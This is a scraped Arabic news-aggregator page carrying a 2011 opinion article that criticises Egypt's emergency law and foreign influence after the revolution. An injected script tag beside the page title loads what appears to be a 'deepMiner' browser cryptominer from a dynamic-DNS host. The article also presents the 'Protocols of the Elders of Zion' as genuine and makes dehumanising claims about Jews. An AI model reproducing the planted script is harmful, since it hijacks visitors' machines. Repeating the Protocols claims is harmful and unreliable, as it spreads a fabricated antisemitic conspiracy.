googletag.defineSlot('/21620968445/Masress_Ar_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-1446553049-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Article_1', 'div-gpt-ad-1446553049-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1446553047-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Article_3', 'div-gpt-ad-1446553047-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1446553048-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Article_2', 'div-gpt-ad-1446553048-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Widget', [[222, 280]], 'div-gpt-ad-374346843-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Widget', 'div-gpt-ad-374346843-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1775746800-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Siteunder', 'div-gpt-ad-1775746800-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); مصرس : الطوارئ ولغة تكميم الأفواه<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
رئيس جامعة بني سويف يعلن أسماء رؤساء اتحاد طلاب الكليات ونوابهم    بالصور.. رئيس المجلس النيابي الصربي في رحلة بحرية بمرسي علم    سيول الخير تعم وادي فيران.. وأمطار على نويبع.. صور    20 صورة ترصد مشروع محطة معالجة الصرف الصحي بالجبل الأصفر    ننشر كلمة وزير الصحة خلال مؤتمر التنوع البيولوجى بشرم الشيخ    د. عماد عبد العظيم استشاري الطرق والكباري:    .. وإجراءات استباقية لتأمين أبراج الكهرباء وصيانة المهمات    «الرى» تعلن تركيب 175 قطعة موفرة للمياه بصنابير مسجدى السيدة نفيسة ويوسف الصحابى    بورصة البحرين تتراجع 0.10% في ختام جلسة الخميس    "مصر للطيران" تطرح تخفيض 35% على رحلات إفريقيا    جامعة الدول العربية تدعو لتوفير الحماية الدولية للشعب الفلسطيني    عماد الدين حسين: السعودية خسرت كثيرا عندما أنكرت علمها بواقعة «خاشقجي» بالبداية    دعوات لفحص المعاملات المالية لحزب البديل بشكل كامل بعد تلقيه تبرعات مشبوهة    مغردون يطلقون تعليقات نارية على بيان النيابة السعودية حول مقتل جمال خاشقجي    الاحتلال الإسرائيلى يقتحم منزل منفذ عملية القدس ويعتقل عائلته للمرة الثانية    شاهد.. لقطات مرعبة من حرائق كاليفورنيا    رئيس وزراء ماليزيا: نقل السفارة الأسترالية من تل أبيب إلى القدس غير مفيد    بريزينتيشن: بيان الاتحاد الإماراتي؟ لم نعقب وبنود التعاقد تتضمن العودة للجهاز الفني    مصدر بالمصري ليلا كورة: نرغب في ضم باسم مرسي    فيديو - ثنائي يوفنتوس الحاسم    كيسي يثأر من رابتورز وجيمس يتقدم في قائمة الأكثر نقاطا    أمطار غزيرة علي الإسكندرية.. السيول تضرب قرية بأسيوط.. وطوارئ بالمحافظات    سلاما لشهداء الوطن    حبس امرأتين بينهما «كوافيرة» عامين للاتجار بالمخدرات ببولاق الدكرور    اصطياد حرامي الفضة بالجمالية    بالصور.. حملة لإزالة أدوار البناء المخالفة في المهد بطنطا    بالصور| انفجار ماسورة مياه بمحور المشير.. وارتباك بحركة المرور بالتجمع    استمرار سقوط الأمطار وتكاثر السحب غدًا    ضبط 11 من العناصر الخطرة في حملة أمنية بالقليوبية    الأقصر تحتضن مهرجان الشعر العربي برعاية سلطان القاسمي    تعرف على موعد حفل شيرين الجديد    يواصل التصوير في مصر الجديدة    شاهد..ياسمين رئيس في شوارع بيروت    القول الحق فى مَولد خير الخلق    طارق سلمان: كلية طب الأزهر تقود الجامعة في تصنيفات عالمية    وزير المالية ل«الشروق»: الالتزام بالبرامج البيئية شرط توفير التمويل للمشروعات    محافظ أسوان يهنئ الدكتور مجدي يعقوب بمناسبة عيد ميلاده    غدا.. وزير الأوقاف يلتقي قيادات الدعوة بالدقهلية    حكم الجلوس في الصلاة لغير القادر    الخبر التالى:    وزير الرياضة: مصر تسعى للدخول ضمن أفضل 10 دول في الرياضة التنافسية    30 يونيو.. الانتهاء من الأعمال الإنشائية بمستشفى جهينة المركزي    ميندي لاعب سيتي يخضع لجراحة في الركبة    محافظ الأقصر يلتقى وفد مشروع إعادة اكتشاف الأصول التراثية لإسنا    مكتبة مصر الجديدة تظهر بإطلالة جديدة في عيد ميلادها ال 73    إغلاق الأكاديمية الدولية للتعليم بسبب العمل بدون ترخيص    متحف النسيج ينظم احتفالية بمناسبة المولد النبوي الشريف واليوم العالمي للطفولة    أخبار قد تهمك    علي معلول ومحمد نجيب يواصلان التأهيل في الأهلي    أنباء عن وقف التحالف العربي عملياته في الحديدة    " جروس" يصل القاهرة اليوم ليستكمل تدريبات الزمالك    تناول 4 فناجين قهوة يومياً يقى من مرض السكر    شاهد.. الكلية الفنية العسكرية تحصد جائزتين    دراسة: البشر أفضل في تذكر الأسماء عن الوجوه    بيع قلادة ماري أنطوانيت ب36 مليون دولار في مزاد بجنيف    بوضوح    كلام بحب    .. والسلام ختام    







شكرا على الإبلاغ!
سيتم حجب هذه الصورة تلقائيا عندما يتم الإبلاغ عنها من طرف عدة أشخاص.





الطوارئ ولغة تكميم الأفواه
نشر في شباب مصر يوم 26 - 09 - 2011

ان من أهم أسباب قيام ثورة 25 يناير تقويض الدولة البوليسية وإلغاء قانون الطوارئ من أجل:
- حرية الرأي والتحول الى الديمقراطية الحقة.
- التظاهر السلمي لتحسين أوضاع البلاد.
- رفع الأصوات ضد قوى الاستبداد الغاصبة للحرية.
- وضع أسس للدولة الحديثة وليس الحلم بالمدينة الفاضلة " اليوتوبيا "
- العمل على تحقيق العدالة والحرية عن طريق وضع مبادئ دستورية لدولة مدنية يسودها العدالة ويحكمها القانون.
من اجل ذلك قامت مليونية تصحيح المسار قِبَال السفارة الإسرائيلية ولكن ما حدث هو خروج على الشرعية و تهور من الشباب الذين اعتقدوا انهم يحفظون بذلك للجندي المصري كرامته ومن ثم استغلت الدولة العبرية واقعة الاقتحام لإنشاء أزمة بين الإدارة الانتقالية والثوار ومن ثم إطفاء نور الثورة والرجوع بها الى سابق العهد الى عصر الظلمات وكبت الحريات.
من مساوئ اليهود اتخاذهم برتوكولات حكماء صهيون منهاجاً في التعامل مع الآخرين وان ما دونهم حيوانات تهدر دماؤهم وتسرق أموالهم وتغتصب أراضيهم و نساؤهم ؛ إصابتهم النرجسية وظنوا انهم شعب الله المختار والجنس الذي يسود البشرية وما دونهم حيوانات وعبيد ومن ثم كان السخط العربي والمصري خاصة.
ان تفعيل قانون الطوارئ نصر للكيان الصهيوني و الليبرالي لمصادرة الأصوات المصرية الباحثة عن الحرية، فسحقاً للمعونة الأمريكية.
اسأل هل سنرجع الى سابق عهدنا من اجل عيون إسرائيل وأمريكا؟ فهم يخشوا من الدولة المدنية ذات المرجعية الدينية ؛ حتى لانستطيع الانفكاك عنهم فمن لا يملك قوته لا يملك تحقيق مصيره.
علينا اللحاق بالقطار التركي قبل فوات الأوان فهو قطار برلماني ذو مرجعية إسلامية به كافة مقومات النجاح دولة مدنية ذات مرجعية دينية " أوربية التقدم إسلامية الأخلاق"
نتمنى من المجلس العسكري الذي حافظ على الثورة في مهدها ان يسارع في انتقال السلطة وان يلغى قانون كبت الحريات من اجل صيانة وكرامة الشعب المصري فلن ينصلح حال الأمة برضاء أمريكا وإسرائيل فهم يريدون لنا العجز لا القيام ،القهر لا الحرية والظلام لا الضياء والتخلف لا التقدم ، ولكن بالوحدة بين كافة الأطياف السياسية والخروج بنظام ديمقراطى متفق عليه يقود مصر للإمام اقتصاديا وعلميا واجتماعيا وسياسيا.
ان الثورات القادمة ستكون ثورات ضد المجاعات ، والمرض والجهل الفقر و الغلاء وعلينا ان نضحي بكل شيء من اجل ان يحيا أبناءنا وأحفادنا حياة كريمة ليس ألان ولكن بعد ان نضع الأساس الدستوري السليم الذي يمكّن المجتمع من إرساء قواعد الديمقراطية والمساهمة في إنشاء مصر الحديثة.
حسين الشندويلى
هيئة قناة السويس


انقر هنا لقراءة الخبر من مصدره.